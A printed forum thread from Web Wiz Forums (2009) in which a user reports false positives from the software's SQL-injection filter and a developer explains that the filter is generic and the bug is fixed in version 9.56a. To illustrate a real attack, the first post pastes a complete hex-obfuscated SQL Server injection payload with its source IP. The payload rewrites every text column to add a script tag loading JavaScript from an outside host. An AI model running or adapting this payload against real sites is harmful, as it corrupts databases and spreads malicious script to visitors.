FYI on SQL Injection
Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=27177
Printed Date: 02 April 2026 at 8:34pm
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com
Topic: FYI on SQL Injection
Posted By: ohiopbx
Subject: FYI on SQL Injection
Date Posted: 26 March 2009 at 7:37pm
Afternoon, I appreciate the effort to minimize SQL injection, however the implementation of the SQLInjetion functions seems to hurt the forum than it does make it better. I get a lot errors b/c my topic titles are like "where-can-i-pick-up-a-bob-long" and the "where" is causing the issue.
I've dealt with SQL injection and this is an example of a true sql injection:
;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6B6F7266642E72752F6E67672E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220 AS VARCHAR(4000));EXEC(@S);-- IP: 117.193.131.212 |
Here is a link to all the injections I have tracked for one client of mine:
http://johnbauctions.com/gallery/images/log/lastUpdated.txt
So I just wanted to share this.
Cody
|
Replies:
Posted By: Scotty32
Date Posted: 26 March 2009 at 7:59pm
Make sure you are running v9.56a as http://forums.webwiz.net/sql-injection-attack-warnings-after-upgrade_topic27141.html" rel="nofollow - there was a bug in V9.56 .
(had a look at your homepage and your on 9.56)
-------------
S2H.co.uk - http://www.s2h.co.uk/wwf/" rel="nofollow - WebWiz Mods and Skins
For support on my mods + skins, please use http://www.s2h.co.uk/forum/" rel="nofollow - my forum .
|
Posted By: ohiopbx
Date Posted: 26 March 2009 at 8:08pm
Posted By: WebWiz-Bruce
Date Posted: 27 March 2009 at 10:30am
The SQL Injection Examples that you have are specific to one type of virus that was very rampant about 10 months ago. There are 100's of different ways to do SQL Injections which is why the SQL Injection test within Web Wiz Forums is more generic to try and capture all types of SQL Injection, not just the one type in the examples you have.
SQL Injections are quite a complex subject. Probably somewhere in the region of 500 hours have been spent on this with Web Wiz Forums investigation many different types of SQL Injection across different database types. It's something worth looking into as there are many hacking sites devoted to this subject which are worth checking out to make sure your own sites are fully protected against this type of vulnerability.
The issue that you have with your own forum with the false/positives has been fixed with release 9.56a. The issue doesn't effect users who are using the new URL Rewrite Tool.
-------------
https://www.webwiz.net/web-wiz-forums/forum-hosting.htm" rel="nofollow - Web Wiz Forums Hosting
https://www.webwiz.net/web-hosting/windows-web-hosting.htm" rel="nofollow - ASP.NET Web Hosting
|
Posted By: billd3
Date Posted: 27 March 2009 at 6:17pm
My brain hurts..
Guess I'd better download again, LOL
-------------
BillD
http://theamcpages.com
http://theamcforum.com
|
|